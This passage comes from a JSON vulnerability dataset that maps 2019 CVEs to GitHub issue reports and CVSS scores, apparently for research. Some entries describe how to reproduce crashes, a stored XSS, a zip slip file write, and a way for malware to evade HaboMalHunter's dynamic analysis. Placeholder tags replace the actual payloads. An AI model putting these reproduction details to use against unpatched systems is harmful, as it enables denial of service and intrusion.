  35967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35968. "severity": "MEDIUM",
  35969. "baseScore": 6.5,
  35970. "impactScore": 3.6,
  35971. "exploitabilityScore": 2.8
  35972. },
  35973. {
  35974. "CVE_ID": "CVE-2019-13110",
  35975. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/843",
  35976. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/843",
  35977. "Repo_new": "exiv2/exiv2",
  35978. "Issue_Created_At": "2019-05-13T12:58:33Z",
  35979. "description": "Integer overflow causes out of bounds read in APITAG",
  35980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35981. "severity": "MEDIUM",
  35982. "baseScore": 6.5,
  35983. "impactScore": 3.6,
  35984. "exploitabilityScore": 2.8
  35985. },
  35986. {
  35987. "CVE_ID": "CVE-2019-13111",
  35988. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/791",
  35989. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/791",
  35990. "Repo_new": "exiv2/exiv2",
  35991. "Issue_Created_At": "2019-04-24T16:03:00Z",
  35992. "description": "Integer overflow, leading to very large allocation in APITAG There is a bug at APITAG URLTAG . If APITAG then the subtraction overflows and the bounds check on size is ineffective. There is an additional problem in this function, which is that the error conditions are not checked after the calls to APITAG . Calls to APITAG should always be followed by calls to ERRORTAG and APITAG , to make sure that the buffer was read successfully. This means that the code does not notice that the file size is much smaller than the value of size would suggest. This has enabled me to write a APITAG which causes exi NUMBERTAG to run for almost a minute, scanning NUMBERTAG GB of uninitialized memory. Here is the APITAG which I have tested on master NUMBERTAG dfdb9 URLTAG : FILETAG . You can run the APITAG like this to see the long running behavior: CODETAG Or if you use ulimit to lower the maximum allocation size to less than NUMBERTAG GB then exi NUMBERTAG will crash: ERRORTAG",
  35993. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35994. "severity": "MEDIUM",
  35995. "baseScore": 5.5,
  35996. "impactScore": 3.6,
  35997. "exploitabilityScore": 1.8
  35998. },
  35999. {
  36000. "CVE_ID": "CVE-2019-13112",
  36001. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/845",
  36002. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/845",
  36003. "Repo_new": "exiv2/exiv2",
  36004. "Issue_Created_At": "2019-05-13T13:42:43Z",
  36005. "description": "Out of memory error due to unchecked allocation size in APITAG",
  36006. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36007. "severity": "MEDIUM",
  36008. "baseScore": 6.5,
  36009. "impactScore": 3.6,
  36010. "exploitabilityScore": 2.8
  36011. },
  36012. {
  36013. "CVE_ID": "CVE-2019-13113",
  36014. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/841",
  36015. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/841",
  36016. "Repo_new": "exiv2/exiv2",
  36017. "Issue_Created_At": "2019-05-13T11:53:23Z",
  36018. "description": "Invalid data location in CRW image causes exi NUMBERTAG to crash. The attached file causes an assertion failure in APITAG .",
  36019. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36020. "severity": "MEDIUM",
  36021. "baseScore": 6.5,
  36022. "impactScore": 3.6,
  36023. "exploitabilityScore": 2.8
  36024. },
  36025. {
  36026. "CVE_ID": "CVE-2019-13114",
  36027. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/793",
  36028. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/793",
  36029. "Repo_new": "exiv2/exiv2",
  36030. "Issue_Created_At": "2019-04-24T20:14:50Z",
  36031. "description": "null pointer dereference in APITAG There is a null pointer deference bug at APITAG URLTAG . If the http server sends back a reply that does not contain a space character, then strchr will return NULL , leading to a null pointer dereference in atoi . To reproduce the bug (tested on master NUMBERTAG dfdb9 URLTAG open two terminals. In the first terminal, start a fake webserver using FILETAG : APITAG In the second terminal, try to connect to the fake webserver: APITAG There are several other calls to strcat and strstr in the same block of code URLTAG . I have not written APITAG for them, but the calls to strchr on lines NUMBERTAG URLTAG and NUMBERTAG URLTAG also look vulnerable to me.",
  36032. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36033. "severity": "MEDIUM",
  36034. "baseScore": 6.5,
  36035. "impactScore": 3.6,
  36036. "exploitabilityScore": 2.8
  36037. },
  36038. {
  36039. "CVE_ID": "CVE-2019-13125",
  36040. "Issue_Url_old": "https://github.com/Tencent/HaboMalHunter/issues/23",
  36041. "Issue_Url_new": "https://github.com/tencent/habomalhunter/issues/23",
  36042. "Repo_new": "tencent/habomalhunter",
  36043. "Issue_Created_At": "2019-07-01T00:45:15Z",
  36044. "description": "Any Malware Compiled with PIE would Evasion from Dynamic Analysis. Current, APITAG uses file command output to check whether target is executable here URLTAG . However, file command would regard any executable complied with _PIE_ as shared object . That means APITAG would not run dynamic analysis for any malware compiled with _PIE_ . Following are two executables from the same source code and compiled w/ and w/o \" no pie\" flag. Compiled with _PIE_ FILETAG CODETAG Analysis result of Habo is available here URLTAG Compiled without _PIE_ FILETAG CODETAG Analysis result of Habo is available here URLTAG",
  36045. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36046. "severity": "HIGH",
  36047. "baseScore": 7.8,
  36048. "impactScore": 5.9,
  36049. "exploitabilityScore": 1.8
  36050. },
  36051. {
  36052. "CVE_ID": "CVE-2019-13132",
  36053. "Issue_Url_old": "https://github.com/zeromq/libzmq/issues/3558",
  36054. "Issue_Url_new": "https://github.com/zeromq/libzmq/issues/3558",
  36055. "Repo_new": "zeromq/libzmq",
  36056. "Issue_Created_At": "2019-06-27T23:54:02Z",
  36057. "description": "Critical security bug report email and GPG address needed. I found a critical security bug of libzmq and would like to report it confidentially, so that hopefully the bug can be fixed before we disclose it. It appears the only information I can find about reporting security bug is here in FAQ URLTAG Besides opening an issue here, do you folks have an email address and corresponding GPG key I can send the details of this bug over?",
  36058. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36059. "severity": "CRITICAL",
  36060. "baseScore": 9.8,
  36061. "impactScore": 5.9,
  36062. "exploitabilityScore": 3.9
  36063. },
  36064. {
  36065. "CVE_ID": "CVE-2019-13133",
  36066. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1600",
  36067. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1600",
  36068. "Repo_new": "imagemagick/imagemagick",
  36069. "Issue_Created_At": "2019-06-18T10:55:16Z",
  36070. "description": "Memory leak in APITAG in coder/bmp.c and APITAG in coder/viff.c.. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two memory leak issues in APITAG in coder/bmp.c and APITAG in coder/viff.c. There is a patch URLTAG which fixed multiple memory leak vulnerabilities. However, the patch for APITAG is wrong. CODETAG Below is the correct logic. CODETAG URLTAG At the same time, there is the same issue in APITAG CODETAG URLTAG Steps to Reproduce APITAG System Configuration APITAG APITAG version: Environment APITAG system, version and so on): Additional information: APITAG",
  36071. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36072. "severity": "MEDIUM",
  36073. "baseScore": 5.5,
  36074. "impactScore": 3.6,
  36075. "exploitabilityScore": 1.8
  36076. },
  36077. {
  36078. "CVE_ID": "CVE-2019-13135",
  36079. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1599",
  36080. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1599",
  36081. "Repo_new": "imagemagick/imagemagick",
  36082. "Issue_Created_At": "2019-06-18T10:33:40Z",
  36083. "description": "Use of uninitialized value in function APITAG Prerequisites y ] I have written a descriptive issue title [ y ] I have verified that I am using the latest version of APITAG [ y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ERRORTAG ( URLTAG We should initialize the APITAG otherwise an use of uninitialized vulnerability occurs, which is similar to CVETAG (fixed in URLTAG and URLTAG ) and CVETAG (fixed in URLTAG and URLTAG APITAG",
  36084. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36085. "severity": "HIGH",
  36086. "baseScore": 8.8,
  36087. "impactScore": 5.9,
  36088. "exploitabilityScore": 2.8
  36089. },
  36090. {
  36091. "CVE_ID": "CVE-2019-13136",
  36092. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1602",
  36093. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1602",
  36094. "Repo_new": "imagemagick/imagemagick",
  36095. "Issue_Created_At": "2019-06-18T11:47:50Z",
  36096. "description": "Possible integer overflow in APITAG in coder/tiff.c. Prerequisites y ] I have written a descriptive issue title [ y ] I have verified that I am using the latest version of APITAG [ y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a possible integer overflow vulnerability in APITAG in coder/tiff.c APITAG URLTAG This issue is similar to the one which was fixed in URLTAG and URLTAG",
  36097. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36098. "severity": "HIGH",
  36099. "baseScore": 7.8,
  36100. "impactScore": 5.9,
  36101. "exploitabilityScore": 1.8
  36102. },
  36103. {
  36104. "CVE_ID": "CVE-2019-13137",
  36105. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1601",
  36106. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1601",
  36107. "Repo_new": "imagemagick/imagemagick",
  36108. "Issue_Created_At": "2019-06-18T11:02:58Z",
  36109. "description": "Memory leak in APITAG in coder/ps.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak issue in APITAG in coder/ps.c ERRORTAG URLTAG It is possible that page_geometry is not destroyed since there is a return statement before it. It is the issue which is similar to the one fixed in URLTAG",
  36110. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36111. "severity": "MEDIUM",
  36112. "baseScore": 6.5,
  36113. "impactScore": 3.6,
  36114. "exploitabilityScore": 2.8
  36115. },
  36116. {
  36117. "CVE_ID": "CVE-2019-13146",
  36118. "Issue_Url_old": "https://github.com/ankane/field_test/issues/17",
  36119. "Issue_Url_new": "https://github.com/ankane/field_test/issues/17",
  36120. "Repo_new": "ankane/field_test",
  36121. "Issue_Created_At": "2019-07-02T00:11:16Z",
  36122. "description": "Arbitrary Variants Via Query Parameters in Field Test NUMBERTAG Due to unvalidated input, an attacker can pass in arbitrary variants via query parameters. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG Fixed Versions NUMBERTAG ersions Unaffected NUMBERTAG Impact If an application treats variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross site scripting (XSS). For instance: APITAG All users running an affected release should upgrade immediately.",
  36123. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  36124. "severity": "MEDIUM",
  36125. "baseScore": 5.3,
  36126. "impactScore": 1.4,
  36127. "exploitabilityScore": 3.9
  36128. },
  36129. {
  36130. "CVE_ID": "CVE-2019-13147",
  36131. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/54",
  36132. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/54",
  36133. "Repo_new": "mpruett/audiofile",
  36134. "Issue_Created_At": "2019-06-29T11:37:12Z",
  36135. "description": "NULL pointer dereference bug in ulaw2linear_buf, in APITAG There exists one NULL pointer dereference bug in ulaw2linear_buf, in APITAG which allows an attacker to cause a denial of service via a crafted file. To reproduce with the attached poc file: ./sfconvert poc output format voc FILETAG gdb output [ registers ] RA NUMBERTAG ffff NUMBERTAG RB NUMBERTAG RC NUMBERTAG RD NUMBERTAG e NUMBERTAG RSI NUMBERTAG d7c ('|}') RDI NUMBERTAG ffffffff RBP NUMBERTAG fffebce NUMBERTAG RSP NUMBERTAG fffffffe2a NUMBERTAG ffff7b NUMBERTAG ef6 APITAG int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG RIP NUMBERTAG ffff7b NUMBERTAG bf APITAG mov WORD PTR [rbx+r NUMBERTAG ax) R NUMBERTAG R NUMBERTAG b NUMBERTAG R NUMBERTAG af NUMBERTAG e9 R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG b NUMBERTAG ffff7dd NUMBERTAG ffff7b NUMBERTAG APITAG lea rsp,[rsp NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [ code NUMBERTAG ffff7b NUMBERTAG ac APITAG lea rsp,[rsp NUMBERTAG ffff7b NUMBERTAG b4 APITAG movzx edi,BYTE PTR [rbp+r NUMBERTAG ffff7b NUMBERTAG ba APITAG call NUMBERTAG ffff7b NUMBERTAG APITAG NUMBERTAG ffff7b NUMBERTAG bf APITAG mov WORD PTR [rbx+r NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG c4 APITAG add r NUMBERTAG ffff7b NUMBERTAG c8 APITAG cmp QWORD PTR [rsp NUMBERTAG r NUMBERTAG ffff7b NUMBERTAG cd APITAG je NUMBERTAG ffff7b NUMBERTAG APITAG NUMBERTAG ffff7b NUMBERTAG d3 APITAG nop [ stack NUMBERTAG fffffffe2a NUMBERTAG ffff7b NUMBERTAG ef6 APITAG int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG fffffffe2a NUMBERTAG fffffffe2b NUMBERTAG aaaa NUMBERTAG fffffffe2b NUMBERTAG ffff7b1ae NUMBERTAG APITAG int, void , int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG fffffffe2c NUMBERTAG fffffffe2c NUMBERTAG fffffffe2d NUMBERTAG b NUMBERTAG fff NUMBERTAG fffffffe2d NUMBERTAG af NUMBERTAG e9 [ ] Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff7b NUMBERTAG bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at APITAG NUMBERTAG linear[i] = _af_ulaw2linear(ulaw[i]); gdb peda$ bt NUMBERTAG ffff7b NUMBERTAG bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at APITAG NUMBERTAG APITAG (this NUMBERTAG b NUMBERTAG at APITAG NUMBERTAG ffff7b1b4b6 in APITAG (file=<optimized out>, trackid=<optimized out>, samples NUMBERTAG nvframeswanted=<optimized out>) at APITAG NUMBERTAG f9e in copyaudiodata (infile NUMBERTAG ae NUMBERTAG outfile NUMBERTAG b6c0, trackid NUMBERTAG e9) at APITAG NUMBERTAG e1 in main (argc=argc APITAG APITAG at APITAG NUMBERTAG ffff NUMBERTAG f3b NUMBERTAG in __libc_start_main (main NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe4f8) at PATHTAG NUMBERTAG c3a in _start ()",
  36136. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36137. "severity": "MEDIUM",
  36138. "baseScore": 6.5,
  36139. "impactScore": 3.6,
  36140. "exploitabilityScore": 2.8
  36141. },
  36142. {
  36143. "CVE_ID": "CVE-2019-13178",
  36144. "Issue_Url_old": "https://github.com/calamares/calamares/issues/1190",
  36145. "Issue_Url_new": "https://github.com/calamares/calamares/issues/1190",
  36146. "Repo_new": "calamares/calamares",
  36147. "Issue_Created_At": "2019-07-02T18:57:53Z",
  36148. "description": "Race condition in changing permissions. Hello, please note that there's a race condition between the time when the key file is created and when the permissions are changed that it is probably visible to some or all users on the system. The safe way to create a file with restricted permissions is to set the process umask NUMBERTAG before creating the file. The shell built in umask NUMBERTAG command can do this. Thanks",
  36149. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36150. "severity": "HIGH",
  36151. "baseScore": 8.1,
  36152. "impactScore": 5.9,
  36153. "exploitabilityScore": 2.2
  36154. },
  36155. {
  36156. "CVE_ID": "CVE-2019-13178",
  36157. "Issue_Url_old": "https://github.com/calamares/calamares/issues/1191",
  36158. "Issue_Url_new": "https://github.com/calamares/calamares/issues/1191",
  36159. "Repo_new": "calamares/calamares",
  36160. "Issue_Created_At": "2019-07-02T19:21:31Z",
  36161. "description": "Unsafe generation of initramfs during FDE. Downstream bug CVETAG , IRC logs from the user who reported it URLTAG . The tl;dr is: APITAG initramfs images that are generated by mkinitramfs will have the user:group set to root:root, but their access flags will be NUMBERTAG rw r r ). This means that any user or even a script that has read access to the file system can read and extract the secret keyfile from an initramfs image.\" initramfs needs to be ran with a different umask here.",
  36162. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36163. "severity": "HIGH",
  36164. "baseScore": 8.1,
  36165. "impactScore": 5.9,
  36166. "exploitabilityScore": 2.2
  36167. },
  36168. {
  36169. "CVE_ID": "CVE-2019-13186",
  36170. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/31",
  36171. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/31",
  36172. "Repo_new": "bg5sbk/minicms",
  36173. "Issue_Created_At": "2019-07-03T05:22:37Z",
  36174. "description": "A stored XSS was found in mc admin/post APITAG A stored XSS was found in mc admin/post APITAG vulnerability is similar to CVETAG but at a different place. POC: Firstly,enter the PATHTAG page and write the payload\u201d APITAG APITAG \u201d into the tags box: FILETAG Save it,then return to the main page to go to the archive page: FILETAG Then you get the window popped with the domain: FILETAG",
  36175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36176. "severity": "MEDIUM",
  36177. "baseScore": 6.1,
  36178. "impactScore": 2.7,
  36179. "exploitabilityScore": 2.8
  36180. },
  36181. {
  36182. "CVE_ID": "CVE-2019-13207",
  36183. "Issue_Url_old": "https://github.com/NLnetLabs/nsd/issues/20",
  36184. "Issue_Url_new": "https://github.com/nlnetlabs/nsd/issues/20",
  36185. "Repo_new": "nlnetlabs/nsd",
  36186. "Issue_Created_At": "2019-06-28T12:12:53Z",
  36187. "description": "Stack based Buffer Overflow in the APITAG function. Hi, While fuzzing nsd checkzone with American Fuzzy Lop, I found a Stack based Buffer Overflow in the APITAG function, in dname.c L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it), issue can be reproduced by running: nsd checkzone all.rr zone NUMBERTAG FILETAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffcd6a NUMBERTAG f at pc NUMBERTAG dadbc bp NUMBERTAG ffcd6a NUMBERTAG sp NUMBERTAG ffcd6a NUMBERTAG cc0 WRITE of size NUMBERTAG at NUMBERTAG ffcd6a NUMBERTAG f thread T NUMBERTAG dadbb in __asan_memcpy ( PATHTAG NUMBERTAG in dname_concatenate PATHTAG NUMBERTAG e NUMBERTAG f in yyparse PATHTAG NUMBERTAG fd1 in zonec_read PATHTAG NUMBERTAG aedd1 in check_zone PATHTAG NUMBERTAG aea NUMBERTAG in main PATHTAG NUMBERTAG fa NUMBERTAG ece6b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG c1d9 in _start ( PATHTAG ) Address NUMBERTAG ffcd6a NUMBERTAG f is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f8f in dname_concatenate PATHTAG This frame has NUMBERTAG object(s NUMBERTAG temp' (line NUMBERTAG APITAG NUMBERTAG ad4aec NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG ad4aed NUMBERTAG ad4aee NUMBERTAG ad4aef NUMBERTAG f1 f1 f1 f NUMBERTAG ad4af NUMBERTAG ad4af NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  36188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36189. "severity": "CRITICAL",
  36190. "baseScore": 9.8,
  36191. "impactScore": 5.9,
  36192. "exploitabilityScore": 3.9
  36193. },
  36194. {
  36195. "CVE_ID": "CVE-2019-13238",
  36196. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/396",
  36197. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/396",
  36198. "Repo_new": "axiomatic-systems/bento4",
  36199. "Issue_Created_At": "2019-05-24T14:17:26Z",
  36200. "description": "Exhaustive memory misunhandle. A memory allocation failure unhandled in APITAG and leads to crashes. APITAG APITAG APITAG allocate a new buffer to parse the atom in the stream. The unhandled memory allocation failure cause the read content memcpy to a null pointer. APITAG This is the start points. FILETAG FILETAG APITAG is the macro define of memcpy and the path formed. Asan trace report: ERRORTAG",
  36201. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36202. "severity": "HIGH",
  36203. "baseScore": 7.5,
  36204. "impactScore": 3.6,
  36205. "exploitabilityScore": 3.9
  36206. },
  36207. {
  36208. "CVE_ID": "CVE-2019-13241",
  36209. "Issue_Url_old": "https://github.com/Sigil-Ebook/flightcrew/issues/52",
  36210. "Issue_Url_new": "https://github.com/sigil-ebook/flightcrew/issues/52",
  36211. "Repo_new": "sigil-ebook/flightcrew",
  36212. "Issue_Created_At": "2019-06-26T15:23:52Z",
  36213. "description": "Zip Slip Vulnerability in APITAG Summary APITAG NUMBERTAG and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as APITAG Slip'. Impact This vulnerability can be used to write files to arbitrary locations and could potentially result in granting an attacker remote access or arbitrary code execution. This is a medium severity issue for Sigil users, but may have greater impact on third party software that uses APITAG as a library. Steps to Reproduce NUMBERTAG Download the attached \"zip APITAG NUMBERTAG On a linux system, process the epub using flightcrew cli. APITAG NUMBERTAG Check for the existence of PATHTAG with the contents \"this is an evil one\". Futher Reading For more information on zip slip vulnerabilities, see URLTAG FILETAG",
  36214. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36215. "severity": "HIGH",
  36216. "baseScore": 7.8,
  36217. "impactScore": 5.9,
  36218. "exploitabilityScore": 1.8
  36219. },
  36220. {
  36221. "CVE_ID": "CVE-2019-13295",
  36222. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1608",
  36223. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1608",
  36224. "Repo_new": "imagemagick/imagemagick",
  36225. "Issue_Created_At": "2019-06-21T05:58:31Z",
  36226. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36228. "severity": "HIGH",
  36229. "baseScore": 8.8,
  36230. "impactScore": 5.9,
  36231. "exploitabilityScore": 2.8
  36232. },
  36233. {
  36234. "CVE_ID": "CVE-2019-13296",
  36235. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1604",
  36236. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1604",
  36237. "Repo_new": "imagemagick/imagemagick",
  36238. "Issue_Created_At": "2019-06-18T17:22:26Z",
  36239. "description": "Direct memory leaks in APITAG and indirect memory leaks . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There're a direct memory leaks in APITAG of APITAG and many indirect memory leaks. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36240. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36241. "severity": "MEDIUM",
  36242. "baseScore": 6.5,
  36243. "impactScore": 3.6,
  36244. "exploitabilityScore": 2.8
  36245. },
  36246. {
  36247. "CVE_ID": "CVE-2019-13297",
  36248. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1609",
  36249. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1609",
  36250. "Repo_new": "imagemagick/imagemagick",
  36251. "Issue_Created_At": "2019-06-21T06:02:04Z",
  36252. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36254. "severity": "HIGH",
  36255. "baseScore": 8.8,
  36256. "impactScore": 5.9,
  36257. "exploitabilityScore": 2.8
  36258. },
  36259. {
  36260. "CVE_ID": "CVE-2019-13298",
  36261. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1611",
  36262. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1611",
  36263. "Repo_new": "imagemagick/imagemagick",
  36264. "Issue_Created_At": "2019-06-21T06:07:48Z",
  36265. "description": "heap buffer overflow at APITAG APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36267. "severity": "HIGH",
  36268. "baseScore": 8.8,
  36269. "impactScore": 5.9,
  36270. "exploitabilityScore": 2.8
  36271. },
  36272. {
  36273. "CVE_ID": "CVE-2019-13299",
  36274. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1610",
  36275. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1610",
  36276. "Repo_new": "imagemagick/imagemagick",
  36277. "Issue_Created_At": "2019-06-21T06:05:24Z",
  36278. "description": "heap buffer overflow at APITAG APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36279. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36280. "severity": "HIGH",
  36281. "baseScore": 8.8,
  36282. "impactScore": 5.9,
  36283. "exploitabilityScore": 2.8
  36284. },
  36285. {
  36286. "CVE_ID": "CVE-2019-13300",
  36287. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1586",
  36288. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1586",
  36289. "Repo_new": "imagemagick/imagemagick",
  36290. "Issue_Created_At": "2019-06-10T15:57:48Z",
